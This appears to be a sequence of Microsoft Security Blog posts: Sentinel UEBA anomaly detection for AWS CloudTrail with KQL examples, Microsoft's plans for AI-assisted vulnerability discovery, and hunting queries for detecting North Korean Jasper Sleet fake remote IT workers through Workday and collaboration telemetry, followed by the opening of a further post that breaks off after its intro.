Here’s an example of an AWS IAM Privilege Modification anomaly. In this case, the CreateLoginProfile API was invoked from a previously unseen user agent in a new country. The annotated screenshot illustrates how the anomaly is displayed and how the AnomalyReasons dynamic field provides binary insights that help investigation. In addition to FirstTimeUserPerformedAction and FirstTimeUserConnectedFromCountry, the BrowserUncommonlyUsedInTenant feature indicates a new user agent (Apache-HttpClient/UNAVAILABLE (Java/21.0.9)) not commonly seen in the tenant.

Figure 3: AWS IAM Privilege Modification anomaly.

The Defender portal also surfaces UEBA anomalies on user entity pages and incident graphs.

This example highlights the Top UEBA anomalies section in an incident graph, where an Anomalous Logon event is displayed with an anomaly score of 0.8 for the account entity cloudinfra-admin.

Figure 4: Top UEBA anomalies on an incident graph in the Defender portal,

You can run built-in queries directly from incident graphs by selecting Go Hunt  All User anomalies queries for immediate context-driven hunting based on UEBA outcomes. For more details, see UEBA integration with Microsoft Sentinel workflows.

Figure 5: Hunt for all user anomalies from an incident graph in the Defender portal.

Traditional vs. new approach

Let’s look at a classic AWS scenario: Unusual anomalous AWS logons. You want to detect a user’s sign in from an unknown location compared to its historical sign-in patterns.

The hard way: Raw log analytics

CloudTrail telemetry can be analyzed using historical baselines and enrichment logic to understand behavioral patterns such as first‑time sign‑ins from new locations. UEBA complements this approach by providing pre‑computed behavioral indicators that can accelerate investigation workflows.

Here is the KQL example on raw log showing necessary operations to add behavioral context.

KQL Code Snippet:

// The "Hard Way" - baseline-heavy console sign-in analytics
let baselineStart = ago(14d);
let baselineEnd   = ago(1h);
let userBaseline =    AWSCloudTrail
    | where TimeGenerated between (baselineStart .. baselineEnd)
    | where EventName == "ConsoleLogin" and isempty(ErrorCode)
    | where isnotempty(SourceIpAddress)
    | extend geo = geo_info_from_ip_address(SourceIpAddress)
    | extend Country = tostring(geo["country"])
    | where isnotempty(Country)
    | summarize HistoricalCountries = make_set(Country) by UserIdentityPrincipalid;
AWSCloudTrail
| where TimeGenerated > ago(1h)
| where EventName == "ConsoleLogin" and isempty(ErrorCode)
| where isnotempty(SourceIpAddress)
| extend geo = geo_info_from_ip_address(SourceIpAddress)
| extend Country = tostring(geo["country"])
| where isnotempty(Country)
| join kind=leftouter (userBaseline) on UserIdentityPrincipalid
| extend FirstTimeUserConnectedFromCountry =    iif(isempty(HistoricalCountries) or not(set_has_element(HistoricalCountries, Country)), true, false)
| where FirstTimeUserConnectedFromCountry == true

The problem: This query is computationally expensive, hard to read, and requires you to manually enrich IP addresses with location data. Accurately mapping IP addresses to ASN and ISP often requires additional enrichments and up to date lookup databases. Because different user behaviors have different levels of variability, static thresholds and manually engineered baselines can still produce false positives or low-value alerts, especially in dynamic environments.

The smart way: Binary feature stacking

With Microsoft Sentinel UEBA, the profiling engine has already done the heavy lifting. It learns the user’s sign-in patterns, peer commonality, and tenant-wide behavioral patterns, and outputs the result to the BehaviorAnalytics table as a set of pre-calculated binary features (true/false flags).

KQL Code Snippet:

// The "Smart Way" - leveraging binary features
BehaviorAnalytics
| where ActionType == "ConsoleLogin" and ActivityType == "signin.amazonaws.com" 
// The Binary Features
| where ActivityInsights.FirstTimeUserConnectedFromCountry == True
and ActivityInsights.CountryUncommonlyConnectedFromInTenant == True and ActivityInsights.FirstTimeConnectionViaISPInTenant == True

The advantages:

  1. Readability: It takes just three lines of code to express a complex idea with UEBA features.
  2. Context: You’re not just looking at uncommon sign ins. You’re stacking user-level and tenant-level indicators – such as location data (FirstTimeUserConnectedFromCountry) and uncommon ISP usage (FirstTimeConnectionViaISPInTenant) – to get a more accurate representation of suspicious behaviors relative to historical patterns.
  3. Stability: You don’t manage the baseline, lookback, and thresholds in your query. The Microsoft Sentinel UEBA ML engine maintains these automatically with baseline windows that vary by enrichment (ranging from 7 to 180 days).

By relying on these binary features, detection authors stop writing code to discover behavioral signals and instead use UEBA features to express detection intent and how to respond based on severity.

Now let’s look at how these same signals appear during investigation and triage.

Real-world attack scenarios: Microsoft Sentinel UEBA in action

The table below summarizes four attack scenarios using a consistent set of fields:

  • Scenario: The threat pattern and where it fits in the kill chain.
  • The attack: What the adversary is attempting to do (high-level behavior).
  • Common log view: How the activity appears in raw CloudTrail when reviewed event-by-event.
  • UEBA signals (binary features): BehaviorAnalytics binary features that provide behavioral context, along with the InvestigationPriority score (0-10) used to tune the severity of deviations.
  • Built-in anomaly surfaced: Names of built-in Microsoft Sentinel UEBA anomalies you can pivot to during triage, including AnomalyScore (0–1) and AnomalyReasons in the Anomalies table.

Together, these scenarios illustrate how raw CloudTrail events provide foundational visibility into AWS activity. Combining this telemetry with behavioral enrichment from Sentinel UEBA can improve the interpretability of events during investigation. The same building blocks—successful sign-ins, IAM changes, Secrets or KMS access, and S3 reads—can represent either normal administration or active intrusion.

By combining CloudTrail activity with Sentinel UEBA enrichments in BehaviorAnalytics, defenders can stack multiple high-value signals to hunt for activity patterns that match attacker tradecraft.

This context accelerates investigations by making it easier to explain why an action is suspicious and to pivot directly to correlated entries in the Anomalies table, including risk scores and reasons. For detection engineers, UEBA signals also act as stable building blocks—simplifying KQL, reducing alert noise, and hardening detections over time.

Note: The UEBA signals column lists examples of relevant binary features, not the exact logic that triggers an anomaly. Anomalies are generated by ML models and don’t map one-to-one to individual features. Use AnomalyReasons in the Anomalies table to understand why a specific anomaly was flagged.

Attack scenarios

ScenarioThe attackCommon log viewUEBA signals (binary features)Built-in anomaly surfaced
Initial Access (Federated / SAML Session Hijack)An attacker gains access to a federated identity session – for example, through a compromised identity provider (IdP) – and uses a SAML or EXTERNAL_IDP flow to perform actions the user rarely performs, from a new location and at an unusual pace.CloudTrail shows federated authentication activity (UserAuthentication / EXTERNAL_IDP, for example, Okta) followed by successful API calls under an assumed role session; each event is valid in isolation.FirstTimeUserConnectedFromCountry = True

ISPUncommonlyUsedInTenant = True

ActionUncommonlyPerformedByUser = True

ActionUncommonlyPerformedInTenant = True
UEBA Anomalous Federated or SAML Identity Activity in AwsCloudTrail
Initial Access and PersistenceAn attacker compromises a developer’s access keys and logs in (for example, through uncommon user agent) to create a backdoor user.CloudTrail shows a successful ConsoleLogin via SDK or CLI user agent and subsequent IAM action, such as CreateUser, all of which are valid API calls without behavioral context.FirstTimeUserConnectedFromCountry = True

BrowserUncommonlyUsedInTenant = True

ActionUncommonlyPerformedByUser = True (CreateUser)

ActionUncommonlyPerformedInTenant = True
Examples: UEBA Anomalous Logon in AwsCloudTrail; UEBA Anomalous IAM Privilege Modification in AwsCloudTrail
Credential Access & Collection (Secrets / KMS Key Discovery)After establishing a foothold with valid credentials, an attacker queries Secrets Manager and KMS to list keys and retrieve secret values, often starting with discovery (ListSecrets/ListKeys) then access (GetSecretValue), sometimes at unusually high frequency.CloudTrail shows a GetSecretValue, ListSecrets, or ListKeys activity which can look like legitimate automation and make static allowlists and thresholds brittle.FirstTimeUserPerformedAction = True

ActionUncommonlyPerformedInTenant = True

UncommonHighVolumeOfOperations = True

ISPUncommonlyUsedInTenant = True
UEBA Anomalous Secret or KMS Key Access in AwsCloudTrail
Data Exfiltration (the “low-and-slow” S3 drain)A compromised admin account performs a burst of repeated S3 GetObject operations—representing a high volume of similar operations within the same service—often targeting multiple objects or prefixes in quick succession to stage data for exfiltration while staying below traditional volume thresholds.If S3 data events are enabled, CloudTrail shows a high frequency of GetObject API calls across multiple objects or buckets in a short time window. Each request appears legitimate in isolation, and overall data transfer may remain below static thresholds, making the activity difficult to detect using traditional methods.UncommonHighVolumeOfOperations = True

CountryUncommonlyPerformedInTenant = True

ActionUncommonlyPerformedByUser = True (S3 GetObject)

ISPUncommonlyUsedInTenant = True
UEBA Anomalous Data Transfer from Amazon S3

Table 1: Examples of Microsoft Sentinel UEBA enrichments in real-world attack scenarios

Built-in Microsoft Sentinel UEBA anomaly MITRE ATT&CK coverage

The visual below illustrates how Microsoft Sentinel UEBA’s AWS anomaly coverage maps across multiple stages of the kill chain:

Together, these anomaly detections provide defenders with end-to-end visibility – from suspicious authentication through sensitive access and data movement – with binary feature enrichments that add high-value behavioral context during investigations.

Figure 6: Microsoft Sentinel UEBA’s AWS anomaly coverage across the attack chain.

Practical implementation: Getting started

Before you begin

Before you run the queries, ensure the following are in place:

Baseline establishment period completed
Allow sufficient time for UEBA to establish user, activity, and device baselines. In most environments, this typically requires 7–14 days of steady telemetry.

AWS environment onboarded to Microsoft Sentinel UEBA
Ensure that AWS CloudTrail (management events and, where applicable, object-level data) is connected, and UEBA is enabled for the AWS data source.

CloudTrail data is flowing consistently
Confirm that AWS CloudTrail events are being ingested into Microsoft Sentinel and visible in Advanced Hunting.

Starter query

Ready to start hunting? Open Advanced Hunting in Microsoft Sentinel and run the following query to explore the BehaviorAnalytics table and inspect enriched AWS behavioral signals. This query intentionally keeps the logic lightweight. The goal is not to “detect” anomalous activity immediately, but to understand how binary behavioral features surface in your environment.

// Starter query – explore UEBA-enriched AWS behavioral signals
BehaviorAnalytics
| where EventSource == "AWSCloudTrail" or ActivityType endswith "amazonaws.com"
| where isnotempty(ActivityInsights)
| where ActivityInsights.FirstTimeUserConnectedFromCountry == true
   or ActivityInsights.ActionUncommonlyPerformedByUser == true
   or ActivityInsights.UncommonHighVolumeOfOperations == true
| project
    TimeGenerated,
    UserName,
    ActionType,
    EventSource,
    ActivityType,
    ActivityInsights
| order by TimeGenerated desc

What to look for

When reviewing the results, focus on:

  • Binary feature combinations
    Individual binary indicators may be benign. Risk emerges when multiple features align (for example: first-time geography and uncommon action).
  • User-centric deviations
    Pay attention to activity that is unusual for that specific identity, even if the action itself is common across the tenant.
  • Low-volume but persistent activity
    UEBA often highlights slow, methodical behavior (for example, repeated S3 reads or Secrets/KMS access) that stays below static thresholds but persists over time.
  • Candidates for anomaly pivoting
    Events that exhibit multiple binary features warrant further investigation by pivoting to the Anomalies table, where UEBA may have already produced a correlated anomaly record with supporting context and reasoning.

Common false positives (and how to filter them)

  • Legitimate automation or CI/CD pipelines
    Why it happens: Service roles or automation accounts may perform actions infrequently or from new infrastructure locations.
    How to filter: Exclude known accounts or IAM roles used exclusively for automation once validated. Be sure to filter only specific types of activities, rather than applying blanket exclusions.
  • New administrators or role changes
    Why it happens: First‑time admin activity naturally triggers “first‑time” and “uncommon” indicators depending on the baseline.
    How to filter: Correlate with recent user creation or role assignment changes before suppressing.
  • Planned operational changes
    Why it happens: Migrations, incident response, or large‑scale maintenance can temporarily skew baselines.
    How to filter: Use time‑bounded filters or change‑window context rather than permanently suppressing signals.

Next steps

Once you are comfortable interpreting enriched behavior:

  1. Stack binary features intentionally (especially User and Tenant level) in detection logic rather than alerting on single indicators.
  2. Pivot to UEBA anomalies to leverage Microsoft’s pre-trained models across MITRE ATT&CK tactics.
  3. Promote successful hunts into detections with minimal additional KQL, relying on UEBA to maintain baselines over time.

This approach lets detection authors focus on behavioral intent, not baseline math – turning raw AWS telemetry into actionable security signals.

Limitations and constraints

Microsoft Sentinel UEBA can substantially reduce detection complexity, but it’s important to account for coverage boundaries and the conditions under which enrichments and scores are most reliable:

Coverage is selective (not “every API”).

  • UEBA does not ingest or model every API call for every AWS service. CloudTrail can be extremely high-volume, so the Microsoft Sentinel UEBA pipeline focuses on the event sources and API actions that are most useful for behavior modeling and that are most commonly correlated with anomalous activity (for example, authentication, identity and permission changes, sensitive data access, and high-impact operations). You can always check the up-to-date list of in-scope event sources, APIs, and data sources in the UEBA data sources reference document (GCPAuditLogs, Okta log sources are also supported). We’re continually adding APIs and event sources.

Enrichments vary by event type.

  • Not all enrichments are populated for all actions. For example, UncommonHighVolumeOfOperations is unlikely to apply to specific types of rare APIs, and location/ISP-related enrichments typically require the original source event to include a valid IP address.

Cross-cloud identity baselines are calculated independently.

  • UEBA profiles identities per data source, which means behavior across cloud platforms is baselined separately. Correlation across environments can be performed manually using the BehaviorAnalytics table when required.

Use scores for prioritization, not direct alerting without retroactive lookup.

  • Treat the AnomalyScore (0-1) and InvestigationPriority (0-10) values as investigation signals to help rank what to look at first – not as sole triggers for alerts. The highest score may not always be the highest priority investigation for your organization. Validate patterns in your environment and use a combination of enrichments, scores, and repeat behavior over time before finalizing alert logic.

Anomaly support in the UI is currently for UPN-based entities.

  • AWS UEBA anomalies are currently surfaced in the UI only on the Account entity, which assumes an identity mapped to a UPN. This works well for environments that use Microsoft Entra ID (or another IdP) with UPN identifiers, but it might not apply to AWS IAM users or AWS resource entities that do not map cleanly to a UPN. To be clear – anomalies are triggered and available for all identity types (with UPN and without UPN), but are only shown in the UI for entities with a UPN.

Some insights depend on identity and user agent fidelity.

  • DeviceInsights rely on parsing UserAgent strings and may be unreliable if user agents are spoofed or manipulated in the original log. Some UserInsights enrichments also depend on identity inventory and metadata snapshots being available. Microsoft identity data from Microsoft Entra is synchronized automatically to the IdentityInfo table – other identity providers are not currently supported, so they might have more limited enrichment coverage.

From raw logs to behavioral context

CloudTrail provides detailed activity data. Sentinel UEBA enhances this telemetry with behavioral context, such as first‑time geography or uncommon ISP usage, to support investigation and detection workflows. A single failed console login is often low signal on its own. That same event becomes far more meaningful when it’s paired with behavioral context, such as a first-time country, an unusual ISP, or activity on a rarely used admin account.

By shifting our focus from writing complex queries to leveraging Microsoft Sentinel UEBA’s binary feature stacking, we gain three practical advantages:

  1. Efficiency: We replace baseline-heavy, maintenance-prone queries with simpler, more readable logic.
  2. Accuracy: We reduce false positives and better tune severity by requiring multiple binary features to align before alerting.
  3. Visibility: We uncover the low-and-slow attacks that static thresholds often miss.

For the modern SOC, the goal is not only to collect logs—it’s to understand behavior. Use the BehaviorAnalytics table as your starting point to understand what “normal” looks like in your environment, then pivot to related Anomalies when you need model-driven prioritization. In practice, this shifts investigations from “What happened?” to “Is this consistent with expected behavior?

Ready to start hunting? Onboard your AWS environment to Microsoft Sentinel UEBA, open Advanced Hunting, and run the starter query in the Practical implementation section to explore the BehaviorAnalytics and Anomalies tables in your environment.

References

Learn more

Learn about the UEBA Behaviors Layer for AWS CloudTrail and other data sources.

The Microsoft Sentinel UEBA Essentials solution provides additional built-in queries.

The post Simplifying AWS defense with Microsoft Sentinel UEBA appeared first on Microsoft Security Blog.

AI-powered defense for an AI-accelerated threat landscape

We are at an inflection point in cybersecurity.

Recent advances in AI model capabilities are changing how vulnerabilities are discovered and exploited. AI models can autonomously discover weaknesses, chain multiple lower-severity issues into working end-to-end exploits, and produce working proof-of-concept code. This significantly compresses the window between vulnerability discovery and exploitation.

These changes require organizations to rethink exposure, response, and risk. However, the same capabilities that can give attackers an advantage also create a unique opportunity for defenders. When applied correctly, they can accelerate vulnerability discovery, improve detection engineering, and reduce time to mitigation. We look forward to working together as an industry to use these AI model capabilities as part of enterprise-grade solutions to tilt the balance in favor of defenders.

Partnering with leading model providers

Security has been and remains the top priority at Microsoft. Over the last two years, through our Secure Future Initiative (SFI), we have strengthened our security foundations for this age of AI, in part by using AI to accelerate vulnerability discovery and remediation and help defend against threats. We have also invested in fundamental AI for security research, including the development of open-source industry benchmarks that can be used to evaluate whether models are ready for real-world security work.

As we move forward, we are accelerating this work and partnering with the industry to use leading models, paired with our platforms and expertise, to turn AI-driven discovery into protection at scale.

Through Project Glasswing, Microsoft is working closely with Anthropic and industry partners to test Claude Mythos Preview, identify and mitigate vulnerabilities earlier, and coordinate defensive response. We evaluated Mythos using CTI-REALM, our open-source benchmark for real-world detection engineering tasks, and the results showed substantial improvements relative to prior models.

Microsoft is also evaluating other models. As part of our overall security approach, we continuously evaluate models from multiple providers as they are made available and integrate them into our enterprise-grade security platform. This multi-model approach is intentional as no single model defines our strategy.

Taking action in three fundamental areas

Defenders need to move faster to keep pace with AI-driven threats. We are focusing on three areas to help customers reduce risk and improve resilience.

1. AI-led vulnerability discovery and mitigations to stay current on software

We plan to incorporate advanced AI models, like Claude Mythos Preview, directly into our Security Development Lifecycle (SDL) to identify vulnerabilities and develop mitigations and updates. This allows us to discover more issues more quickly across a broader surface area than previous methods and address them earlier in the lifecycle.

AI-assisted discoveries are handled through our existing Microsoft Security Response Center (MSRC) processes, including Update Tuesday—our predictable and systematic way of distributing updates to customers—and out-of-band updates, where appropriate. Customers using Microsoft platform as a service (PaaS) and software as a service (SaaS) cloud services do not need to take any action; mitigations and updates are applied automatically. For customers who deploy Microsoft products on their own infrastructure, whether on-premises or self-hosted, staying current on all security updates is now not only the best practice; it is a fundamental requirement for staying secure against AI exposure.

We will deploy detections to Microsoft Defender, our threat protection solution, when updates are released and share details through the Microsoft Active Protections Program (MAPP) partners to help mitigate risk. We are also using advanced AI models to proactively scan select open-source codebases. Identified issues will be addressed through coordinated vulnerability disclosure.

2. AI-ready posture to reduce exposure

Patching, while critical, is not sufficient on its own. We have identified the five dimensions where autonomous AI driven attacks gain disproportionate advantage—patching, open-source software, customer source code, internet-facing assets, and baseline security hygiene.

For each dimension, Microsoft Security Exposure Management provides guidance and capabilities that customers can use to:

  • Assess their current state.
  • Understand prioritized actions to reduce risk.
  • Evaluate “what-if” scenarios before making changes.
  • Apply automation to remediate issues at scale.

These capabilities include tools like Microsoft Defender External Attack Surface Management (EASM) for continuous discovery of internet-facing assets, GitHub Advanced Security with CodeQL, Copilot Autofix for open-source and first-party code, and Microsoft Baseline Security Mode (BSM) to apply foundational controls across Exchange, Microsoft Teams, SharePoint, OneDrive, Office, and Microsoft Entra—with impact simulation before enforcement.

Others in the industry have shared guidance and rightly emphasized the importance of continuous asset discovery and posture management. We are delivering an integrated experience through a new Microsoft Security Exposure Management blade—Secure Now—that combines guidance with the ability to act, so customers proactively reduce their exposure. Secure Now is available today at https://security.microsoft.com/securenow

3. AI-powered solutions to defend at scale

Beyond plans to use advanced AI models directly into our Security Development Lifecycle (SDL), we are separately building new solutions to help customers leverage advanced AI models to improve their security at enterprise scale.

  • Rapidly deployed Defender detections developed for AI-discovered vulnerabilities, sim-shipping with corresponding updates to help mitigate risk immediately.
  • We have learned through our own testing that model capability to discover potential vulnerabilities is only the beginning. Organizations must also be able to use AI to validate and prioritize based on exploitability and impact, and build the fix. To help we plan to productize a new multi-model AI-driven scanning harness developed internally and make it available to customers to streamline their experience and deliver outcomes more quickly. This solution is expected to be available in preview in June 2026.

Our goal is to ensure findings are actionable. While models are powerful on their own, without prioritization and context, large volumes of results can overwhelm development teams. These new solutions are designed to pair model output with the context and security solutions needed for enterprises to drive security effectiveness at scale.

Get started today

Customers can get started now by reviewing the guidance at https://security.microsoft.com/securenow. Any customer with a Microsoft Entra ID will be able to access the guidance. In addition, Microsoft Security customers will have access to capabilities that enable them to assess their exposure and take action.

We have also mobilized our Customer Success organization to support customers in implementing this guidance.

What’s ahead

This work is ongoing. We will continue to share updates as testing progresses, new models emerge, and new guidance and solutions become available. The threat landscape will continue to evolve, but so will our defenses—and we are committed to ensuring that our customers have the tools, guidance, and partnership they need to stay ahead.

Security is a team sport. The organizations that act on this shift—by staying current on patches, reducing exposure, and leveraging AI-powered security solutions—will be significantly harder to compromise than those that do not. The time to act is now and we look forward to partnering with the industry to build a safer world for all.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

The post AI-powered defense for an AI-accelerated threat landscape appeared first on Microsoft Security Blog.

Detection strategies across cloud and identities against infiltrating IT workers

The shift to remote and hybrid work since the pandemic expanded global hiring and accelerated digital onboarding, increasing reliance on online identity verification and remote access. Threat actors such as Jasper Sleet, a North Korea-aligned threat actor, exploit this model by posing as legitimate hires using stolen or fabricated identities and AI-assisted deception to gain trusted access, generate revenue, and in some cases enable data theft, extortion, or follow-on compromise.

In the initial job-discovery phase, these fraudulent applicants posing as remote IT workers systematically survey organization career sites and external hiring portals to identify active technical roles and recruitment workflows. A previously published Microsoft Threat Intelligence blog highlights how these actors use generative AI at scale to analyze job postings and extract role‑specific language, required skills, certifications, and tooling expectations. They then use those insights to construct tailored fake digital personas and submit highly convincing job applications, increasing their likelihood of passing screening and entering legitimate hiring pipelines, and even onboarding once hired into the targeted roles successfully.

Organizations using common and widely adopted human resources (HR) software as a service (SaaS) platforms like Workday often expose their job postings through external career sites for applicants to submit job applications. These job listing sites are often targeted by this threat actor to find open job roles. While this activity might be hard to detect from usual job hunting behavior, knowing the threat actor’s interests and objectives to infiltrate into the target organization might present an opportunity for defenders to look for anomalous patterns in a hiring candidate’s behaviors by leveraging the access to the right telemetry and available threat actor intelligence being published.

While these activities could happen on any HR SaaS platform, this blog focuses on Workday as an example due to its widespread adoption and rich event logs, which are useful for hunting and detection, that are available to customers. The discussion highlights how customers using Microsoft Defender for Cloud Apps can monitor and detect fraudulent remote IT worker activity in pre-recruitment and post-recruitment phases, offering guidance on threat hunting and relevant threat detection strategies to help security and HR teams surface suspicious candidates early and detect risky onboarding activity after hire.

Attack chain overview

In the observed campaigns, the threat actors leverage routine HR workflows like external-facing career sites with open job postings to help with their job search and application process. Once they’re successfully contacted, interviewed, and hired, they complete typical new-hire onboarding formalities like setting up payroll accounts, which are also through the HR SaaS platform like Workday.

Jasper Sleet attack chain
Figure 1. Timeline of events through the recruitment phases.

Activities in pre-recruitment phase

In the pre-recruitment phase, Microsoft has observed Jasper Sleet accessing Workday Recruiting Web Service endpoints exposed through external career sites from known actor infrastructure and email accounts, indicating a discovery phase of open roles and recruitment workflows.

Workday lets organizations use internal, non-public APIs such as Recruiting Web Service to allow programmatic access to apply for jobs in these organizations. These APIs are used to connect to external career sites involved in talent management and applicant tracking systems and allow applicants to browse and apply for open job roles. To access these APIs, an organization has to allow setting up of OAuth clients and associated OAuth tokens, and expose the APIs so that the organization’s external career sites can use them.

Microsoft has observed API call events coming from known Jasper Sleet infrastructure in Workday telemetry to hrrecruiting/* API endpoints. These events access information about job postings, applications, and related questionnaires, and to submit job applications and questionnaires.

Some common API calls being made by the threat actor’s activity when using the Workday portal include the following:

  • hrrecruiting/accounts/*
  • hrrecruiting/jobApplicationPackages/*
  • hrrecruiting/validateJobApplication/*
  • hrrecruiting/resumes/*
Figure 2. Sample view of API call events indicating access to hrrecruiting API endpoints on an organization’s Workday instance from an external account.

It’s important to note here that these API calls could also be made by legitimate job applicants. However, Microsoft has observed the Jasper Sleet threat actor using multiple external accounts suspiciously to access the same set of API calls in a consistent, repeating pattern, as shown in Figure 2, indicating a possible job discovery phase activity on open job roles and following up on job applications submitted. This anomaly sets the threat actor behavior apart from legitimate job applicants.

Defender for Cloud Apps’ Workday connector enables organizations to view and track API activity to their /hrrecruiting endpoints. The connector also lets them identify external accounts and their corresponding infrastructure metadata. Organizations can match this information against any available threat intelligence feeds on Jasper Sleet so they can identify fraudulent applications early in the recruiting process.

Activities in recruiting phase

In the recruiting phase, signals outside of Workday could help with investigation of threat actor behavior. The threat actor communicates with the target organization’s hiring team using emails and meeting conferencing platforms like Microsoft Teams, Zoom, or Cisco Webex for scheduling interviews. Using advanced hunting tables in Microsoft Defender, organizations can track suspicious communications (for example, email and Teams messages with external accounts originating from suspicious IP addresses or email addresses that could possibly be associated with the threat actor) and raise a red flag early in the hiring process. Additionally, organizations that use Zoom or Cisco Webex must leverage Defender for Cloud Apps’ Zoom or Cisco Webex connectors to detect malicious external accounts in the interviewing process.

Organizations can also leverage Defender for Cloud Apps’ DocuSign connector, which enables them to monitor activity related to hiring documentation, like offer letter signing from suspicious external sources.

Activities in post-recruitment phase

When Jasper Sleet is hired for a role in the organization, a legitimate account is created and assigned to them as part of the onboarding process. In organizations that use HR workflows in Workday for onboarding new hires, we’ve observed sign-ins to the newly created Workday profile and setting up of payroll details originating from known Jasper Sleet infrastructure.

Figure 3. A sample event indicating a payroll account change operation by a new hire.

The threat actor now has legitimate access to organization data, and they can access internal SaaS applications like Teams, SharePoint, OneDrive, and Exchange Online. Hence, it’s important to investigate any alerts associated with new hire accounts, especially alerts that are related to access to organization data from different locations and anonymous proxies performing search and downloads on Microsoft 365 suite or other third-party SaaS applications. Microsoft has observed a spike in impossible travel alerts for such new hires, indicating suspicious remote IT worker behavior in the initial months of onboarding.

Figure 4. Frequent impossible travel alerts on a new hire in the first two months since joining.

Mitigation and protection guidance

Microsoft recommends leveraging access to telemetry coming from multiple data sources and monitoring behavioral anomalies in hiring candidates as part of background verification in HR recruitment processes. Organizations can also leverage threat intelligence as an aid, when available, to strengthen confidence in these anomalies.

These recommendations draw from established Defender blog guidance patterns and align with protections offered across Microsoft Defender XDR. 

Organizations can follow these recommendations to mitigate threats associated with this threat actor:      

Enable connectors in Microsoft Defender for Cloud Apps to gain visibility and track activity from external user accounts associated with fraudulent candidates. Investigate events of both external users and newly hired internal users originating from malicious infrastructure. For more information, see the following articles in Microsoft Learn:

Educate users on social engineering. Train employees to recognize suspicious behaviors during hiring process and in new hires. For more information on the threat actor behavior, read this blog: Jasper Sleet: North Korean remote IT workers’ evolving tactics to infiltrate organizations

Microsoft Defender XDR detections

Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.

Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.

Tactic Observed activity Microsoft Defender coverage 
Resource Development  Threat actors accessing external facing Workday sites to research job postings and submit job applications.Microsoft Defender for Cloud Apps
– Possible Jasper Sleet threat actor activity in Workday Recruiting Web Service  
Resource Development  Once hired and onboarded, the threat actor signs in to the newly created Workday account to update payroll details from known Jasper Sleet infrastructureMicrosoft Defender for Cloud Apps
– Suspicious Payroll and Finance related activity in Workday
Initial AccessAnomalous sign-ins and access to internal resources by newly hired threat actorMicrosoft Defender XDR
– Impossible travel
– Sign-in activity by suspected North Korean entity Jasper Sleet

Threat intelligence reports

Microsoft Defender XDR customers can use the following threat analytics reports in the Defender portal (requires license for at least one Defender XDR product) to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.

Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.

Hunting queries

Microsoft Defender XDR customers can run the following queries to find related activity to any suspicious indicators in their networks:

Access to Workday Recruiting Web Service API by external users

let api_endpoint_regex = 'hrrecruiting/*';
CloudAppEvents
| where Application == 'Workday'
| where IsExternalUser
| where ActionType matches regex api_endpoint_regex
| where IPAddress in (<​suspiciousips>) or AccountId in (<​suspicious_emailids>);
| summarize make_set(ActionType) by AccountId, IPAddress, bin(Timestamp, 1d)

Emails and Teams communications related to interviews

//Email communications

EmailEvents 
| where SenderMailFromAddress == "<​suspicious_emailids>" or RecipientEmailAddress == "<​suspicious_emailids>"
| where Subject has "Interview"
| project Timestamp, SenderMailFromAddress, SenderDisplayName, SenderIPv4, SenderIPv6, RecipientEmailAddress, Subject, DeliveryAction, DeliveryLocation

EmailEvents 
| where SenderIPv4 == "<​suspiciousIPs>" or SenderIPv6 == "<​ suspiciousIPs>"
| where Subject has "Interview"
| project Timestamp, SenderMailFromAddress, SenderDisplayName, SenderIPv4, SenderIPv6, RecipientEmailAddress, Subject, DeliveryAction, DeliveryLocation

//Microsoft Teams communications

CloudAppEvents
| where Application == "Microsoft Teams"
| where IsExternalUser
| where AccountId == "<​suspicious_emailids>" or AccountDisplayName == "<​suspicious_emailids>"
| summarize make_set(ActionType) by IPAddress, AccountId, bin(Timestamp, 1d)

CloudAppEvents
| where Application == "Microsoft Teams"
| where IsExternalUser
| where IPAddress == "<​suspiciousIPs​>" 
| summarize make_set(ActionType) by IPAddress, AccountId, bin(Timestamp, 1d)

//Zoom or Cisco Webex communication events after enabling the Microsoft Defender for Cloud apps connectors

CloudAppEvents
| where Application == "Zoom"
| where IsExternalUser
| where IPAddress == "<​suspiciousIP​s>" 
| summarize make_set(ActionType) by IPAddress, AccountId, bin(Timestamp, 1d)

CloudAppEvents
| where Application == "Cisco Webex"
| where IsExternalUser
| where IPAddress == "<​suspiciousIPs​>"
| summarize make_set(ActionType) by IPAddress, AccountId, bin(Timestamp, 1d)

Hiring phase involving accessing and signing of agreements through DocuSign

CloudAppEvents
| where Application == "DocuSign"
| where IsExternalUser
| where ActionType == "ENVELOPE SIGNED"
| where IPAddress in ("<​suspiciousIPs>") or AccountId == "<​suspicious_emailids>"

New hire onboarding and payroll activities originating from known Jasper Sleet infrastructure

CloudAppEvents
| where Application == "Workday"
| where AccountId == "<​NewHireWorkdayId>"
| where ActionType has_any ("Add", "Change", "Assign", "Create", "Modify") and ActionType has_any ("Account", "Bank", "Payment", "Tax")
| where IPAddress in ("<​suspiciousIPs>")
| summarize make_set(ActionType) by IPAddress, bin(Timestamp, 1d)

References

This research is provided by Microsoft Defender Security Research with contributions from  members of Microsoft Threat Intelligence.

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn, X (formerly Twitter), and Bluesky.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.

Review our documentation to learn more about our real-time protection capabilities and see how to enable them within your organization.   

The post Detection strategies across cloud and identities against infiltrating IT workers appeared first on Microsoft Security Blog.

Making opportunistic cyberattacks harder by design

This is part of a series of blogs and interviews conducted with our Microsoft Deputy CISOs, in which we surface a number of mission-critical security recommendations and best practices that businesses can enact right now and derive real meaningful benefits from. In this article, Ilya Grebnov, Deputy CISO for Microsoft Dynamics 365 and Power Platform at Microsoft dives into cyberattacks of opportunity and how to prevent them.

